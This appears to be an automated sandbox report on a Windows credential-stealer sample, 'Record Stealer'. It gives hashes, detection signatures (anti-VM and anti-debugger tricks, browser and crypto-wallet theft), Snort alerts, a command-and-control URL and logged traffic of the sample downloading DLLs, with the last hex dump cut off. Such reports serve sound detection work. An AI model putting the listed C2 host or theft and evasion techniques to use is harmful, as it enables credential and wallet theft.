Windows Analysis Report
VASkmEQ4iU.exe

Overview

General Information

Sample Name: VASkmEQ4iU.exe
Analysis ID: 652389
MD5: f9b340f49ab31913222c64d3eed70ed3
SHA1: 4246faa6c02672009aaf44940ec9e1c9f3e72df9
SHA256: 06cd1b17015926da3c902f7b67e130054e9170f355a1cdf1274ddc955f4152ee
Tags: exeRecordBreaker
Infos:

Detection

Record Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Record Stealer
Snort IDS alert for network traffic
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to steal Crypto Currency Wallets
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Query firmware table information (likely to detect VMs)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Is looking for software installed on the system
Uses 32bit PE files
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
PE file contains more sections than normal
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Entry point lies outside standard sections

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: VASkmEQ4iU.exe ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: VASkmEQ4iU.exe Joe Sandbox ML: detected
Source: 00000000.00000002.480998918.00000000019DA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Record Stealer {"C2 url": ["http://185.62.56.113/"]}
Uses 32bit PE files
Source: VASkmEQ4iU.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: VASkmEQ4iU.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.0.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.0.dr
Source: Binary string: nss3.pdb source: nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2036882 ET TROJAN Generic Stealer Config Download Request 192.168.2.5:49758 -> 185.62.56.113:80
Source: Traffic Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.5:49758 -> 185.62.56.113:80
Source: Traffic Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 185.62.56.113:80 -> 192.168.2.5:49758
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.62.56.113/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SNELNL SNELNL
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:20 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:22 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:23 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:24 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:25 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:26 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sun, 26 Jun 2022 07:36:26 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 